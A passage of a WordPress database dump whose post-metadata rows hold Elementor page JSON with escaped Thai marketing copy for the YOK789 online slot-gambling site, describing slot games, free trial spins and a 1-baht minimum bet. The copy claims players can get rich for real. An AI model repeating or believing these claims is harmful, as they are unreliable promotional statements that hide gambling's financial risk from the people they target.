\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2762,379,'_thumbnail_id','371'),(2763,379,'_elementor_edit_mode','builder'),(2764,379,'_elementor_template_type','wp-page'),(2765,379,'_elementor_version','3.35.5'),(2766,379,'_elementor_pro_version','3.32.3'),(2767,379,'_wp_page_template','default'),(2768,379,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2769,379,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 